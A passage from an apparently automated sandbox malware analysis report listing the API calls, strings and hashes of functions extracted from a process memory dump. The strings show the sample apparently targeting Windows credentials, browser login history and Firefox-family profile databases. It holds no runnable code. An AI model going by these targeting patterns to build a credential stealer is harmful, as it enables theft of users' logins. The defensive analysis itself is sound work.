                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                            • String ID:
                                            • API String ID: 115830560-3916222277
                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                            APIs
                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                            • GetLastError.KERNEL32 ref: 0041847E
                                            • free.MSVCRT ref: 0041848B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CreateFile$ErrorLastfree
                                            • String ID: |A
                                            • API String ID: 77810686-1717621600
                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0041249C
                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                            • wcscpy.MSVCRT ref: 004125A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                            • String ID: r!A
                                            • API String ID: 2791114272-628097481
                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                            APIs
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                            • wcslen.MSVCRT ref: 0040C82C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                            • API String ID: 2936932814-4196376884
                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                            • String ID: BIN
                                            • API String ID: 1668488027-1015027815
                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                            APIs
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                            • wcslen.MSVCRT ref: 0040BE06
                                            • wcsncmp.MSVCRT ref: 0040BE38
                                            • memset.MSVCRT ref: 0040BE91
                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                            • wcschr.MSVCRT ref: 0040BF24
                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                            • String ID:
                                            • API String ID: 697348961-0
                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                            APIs
                                            • memset.MSVCRT ref: 00403CBF
                                            • memset.MSVCRT ref: 00403CD4
                                            • memset.MSVCRT ref: 00403CE9
                                            • memset.MSVCRT ref: 00403CFE
                                            • memset.MSVCRT ref: 00403D13
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403DDA
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                            • String ID: Waterfox$Waterfox\Profiles
                                            • API String ID: 3527940856-11920434
                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                            APIs
                                            • memset.MSVCRT ref: 00403E50
                                            • memset.MSVCRT ref: 00403E65
                                            • memset.MSVCRT ref: 00403E7A
                                            • memset.MSVCRT ref: 00403E8F
                                            • memset.MSVCRT ref: 00403EA4
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403F6B
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                            • API String ID: 3527940856-2068335096
                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                            APIs
                                            • memset.MSVCRT ref: 00403FE1
                                            • memset.MSVCRT ref: 00403FF6
                                            • memset.MSVCRT ref: 0040400B
                                            • memset.MSVCRT ref: 00404020
                                            • memset.MSVCRT ref: 00404035
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 004040FC
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                            • API String ID: 3527940856-3369679110
                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                            APIs
                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                            • API String ID: 3510742995-2641926074
                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                            APIs
                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 004033B7
                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                            • wcscmp.MSVCRT ref: 004033FC
                                            • _wcsicmp.MSVCRT ref: 00403439
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                            • String ID: $0.@
                                            • API String ID: 2758756878-1896041820
                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 2941347001-0
                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                            APIs
                                            • memset.MSVCRT ref: 00403C09
                                            • memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                            • wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • wcscat.MSVCRT ref: 00403C70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memsetwcscat$Closewcscpywcslen
                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                            • API String ID: 3249829328-1174173950
                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                            APIs
                                            • memset.MSVCRT ref: 0040A824
                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • wcscpy.MSVCRT ref: 0040A854
                                            • wcscat.MSVCRT ref: 0040A86A
                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 669240632-0
                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                            APIs
                                            • wcschr.MSVCRT ref: 00414458
                                            • _snwprintf.MSVCRT ref: 0041447D
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                            • String ID: "%s"
                                            • API String ID: 1343145685-3297466227
                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                            APIs
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProcessTimes
                                            • String ID: GetProcessTimes$kernel32.dll
                                            • API String ID: 1714573020-3385500049
                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                            APIs
                                            • memset.MSVCRT ref: 004087D6
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                            • memset.MSVCRT ref: 00408828
                                            • memset.MSVCRT ref: 00408840
                                            • memset.MSVCRT ref: 00408858
                                            • memset.MSVCRT ref: 00408870
                                            • memset.MSVCRT ref: 00408888
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                            • String ID:
                                            • API String ID: 2911713577-0
                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                            APIs
                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                            Strings
                                            Memory Dump Source
